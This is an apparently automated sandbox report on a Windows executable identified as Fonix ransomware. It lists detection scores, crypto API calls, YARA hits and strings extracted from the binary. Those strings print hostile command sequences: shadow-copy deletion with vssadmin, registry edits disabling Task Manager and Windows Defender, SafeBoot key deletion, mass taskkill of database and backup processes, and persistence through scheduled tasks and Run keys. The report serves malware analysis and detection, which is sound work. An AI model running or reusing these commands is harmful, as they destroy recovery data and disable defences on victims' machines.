Source: 8QxrJSmRtc.exe | Virustotal: Detection: 41% |
Source: 8QxrJSmRtc.exe | ReversingLabs: Detection: 58% |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01408900 CryptReleaseContext,_Init_thread_footer, | 0_2_01408900 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014081C0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, | 0_2_014081C0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014089F0 CryptGenRandom,CryptReleaseContext, | 0_2_014089F0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01408330 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, | 0_2_01408330 |
Source: 8QxrJSmRtc.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe |
Source: 8QxrJSmRtc.exe | String found in binary or memory: https://code.jquery.com/jquery-latest.js |
Source: 8QxrJSmRtc.exe | String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif |
Source: 8QxrJSmRtc.exe | String found in binary or memory: https://www.who.int |
Source: Yara match | File source: 8QxrJSmRtc.exe, type: SAMPLE |
Source: Yara match | File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY |
Source: Yara match | File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE |
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: 8QxrJSmRtc.exe | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: 8QxrJSmRtc.exe | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0145F914 | 0_2_0145F914 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01458928 | 0_2_01458928 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0145F07C | 0_2_0145F07C |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013BE0E0 | 0_2_013BE0E0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E30E0 | 0_2_013E30E0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0146A32C | 0_2_0146A32C |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01456330 | 0_2_01456330 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014453D4 | 0_2_014453D4 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01451BDC | 0_2_01451BDC |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E1A70 | 0_2_013E1A70 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0144F2C4 | 0_2_0144F2C4 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013BCAD0 | 0_2_013BCAD0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0144F548 | 0_2_0144F548 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B6D20 | 0_2_013B6D20 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E4D00 | 0_2_013E4D00 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013C5D40 | 0_2_013C5D40 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E4580 | 0_2_013E4580 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014094C0 | 0_2_014094C0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0145DCC4 | 0_2_0145DCC4 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B84A0 | 0_2_013B84A0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B13F0 | 0_2_013B13F0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B5CD0 | 0_2_013B5CD0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E2700 | 0_2_013E2700 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013C0F80 | 0_2_013C0F80 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0144F7B0 | 0_2_0144F7B0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014597B8 | 0_2_014597B8 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014556B4 | 0_2_014556B4 |
Source: classification engine | Classification label: mal84.rans.evad.winEXE@1/0@0/0 |
Source: 8QxrJSmRtc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: 8QxrJSmRtc.exe | Static file information: File size 1266176 > 1048576 |
Source: 8QxrJSmRtc.exe | Static PE information: section name: _RDATA |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01421020 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_01421020 |
Source: 8QxrJSmRtc.exe | Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST 
MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EX |